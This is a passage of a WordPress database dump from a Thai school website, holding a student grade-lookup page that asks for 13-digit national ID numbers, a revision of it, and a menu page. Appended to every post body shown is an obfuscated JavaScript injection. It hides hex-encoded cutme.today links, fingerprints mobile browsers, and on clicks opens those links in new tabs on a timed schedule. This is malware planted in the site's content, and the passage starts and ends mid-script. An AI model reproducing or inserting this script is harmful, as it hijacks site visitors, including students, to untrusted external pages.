Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2024-08-08 21:09:59','2024-08-08 14:09:59','',459,'http://pakhaeng.ssk.in.th/?p=740',0,'revision','',0),
(741,1,'2024-08-08 21:12:06','2024-08-08 14:12:06','<!-- wp:html -->\n<div align=\'center\'><form action=\'https://a3301.obec.expert/services\' method=\'POST\' target=\'_blank\' > <div><input name=\'idcard\' style=\'text-align:center;\' type=\'text\' value=\'\' placeholder=\'เลขบัตร ปชช. 13 หลัก\' /></div> <div><input name=\'schoolid\' type=\'hidden\' value=\'33010169\' required /><button type=\'submit\'>ค้นหา</button></div> </form></div>\n<!-- /wp:html -->\n\n<!-- wp:paragraph -->\n<p>กรอกเลขบัตรประจำตัวประชาชนนักเรียน 13 หลัก เพื่อดูผลการเรียน</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ระบบดูเกรดออนไลน์','','publish','closed','closed','','%e0%b8%a3%e0%b8%b0%e0%b8%9a%e0%b8%9a%e0%b8%94%e0%b8%b9%e0%b9%80%e0%b8%81%e0%b8%a3%e0%b8%94%e0%b8%ad%e0%b8%ad%e0%b8%99%e0%b9%84%e0%b8%a5%e0%b8%99%e0%b9%8c','','','2024-08-08 21:13:46','2024-08-08 14:13:46','',0,'http://pakhaeng.ssk.in.th/?page_id=741',0,'page','',0),
(743,1,'2024-08-08 21:12:06','2024-08-08 14:12:06','<!-- wp:html -->\n<div align=\'center\'><form action=\'https://a3301.obec.expert/services\' method=\'POST\' target=\'_blank\' > <div><input name=\'idcard\' style=\'text-align:center;\' type=\'text\' value=\'\' placeholder=\'เลขบัตร ปชช. 13 หลัก\' /></div> <div><input name=\'schoolid\' type=\'hidden\' value=\'33010169\' required /><button type=\'submit\'>ค้นหา</button></div> </form></div>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ระบบดูเกรดออนไลน์','','inherit','closed','closed','','741-revision-v1','','','2024-08-08 21:12:06','2024-08-08 14:12:06','',741,'http://pakhaeng.ssk.in.th/?p=743',0,'revision','',0),
(744,1,'2024-08-08 21:12:40','2024-08-08 14:12:40','<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\